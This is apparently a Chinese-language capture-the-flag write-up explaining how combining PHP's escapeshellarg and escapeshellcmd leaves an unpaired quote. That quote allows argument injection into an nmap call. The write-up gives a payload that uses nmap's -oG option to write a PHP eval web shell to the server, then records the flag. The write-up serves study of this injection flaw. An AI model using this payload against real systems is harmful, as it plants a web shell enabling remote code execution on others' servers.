知识点:
escapeshellarg 和 escapeshellcmd 绕过
nmap -oG 参数,将结果和命令写入到文件
详细:参考谈谈escapeshellarg参数绕过和注入的问题
escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数
功能 :escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,shell 函数包含 exec(), system() 执行运算符(反引号)
我的理解就是,经过该函数就会对单引号转义:例如:
1' 经过该函数之后就会变为 '1'\'''(可以在线PHP演示)
escapeshellcmd — shell 元字符转义
功能:escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。
反斜线(\)会在以下字符之前插入: &#;`|\?~<>^()[]{}$*, \x0A 和 \xFF*。 *’ 和 “ 仅在不配对儿的时候被转义。 在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替。
我的理解:
会加 \ ,在&#;`|\?~<>^()[]{}$*, \x0A 和 \xFF*的前面加。而*' " 只有在不被配对的情况下加\
例如:
'1' \''' 转化为 :'1'\\''\'
结果先经过escapeshellarg再经过escapeshellcmd 之后就会多出来一个'
通过构造就可以把这个' 去掉,导致它是一个命令而不是字符串;
在这道题中,结合system()函数里面执行nmap,只要把host处理一下就行;
首先host会被 ' ' 包裹。构造一句话
' <?php eval($_POST[1]) ?> -oG shell.php '
这里要注意,后面的php要有空格;
蚂蚁连接就OK,
flag{b596539b-8bef-4e41-a7b5-5cce61262483}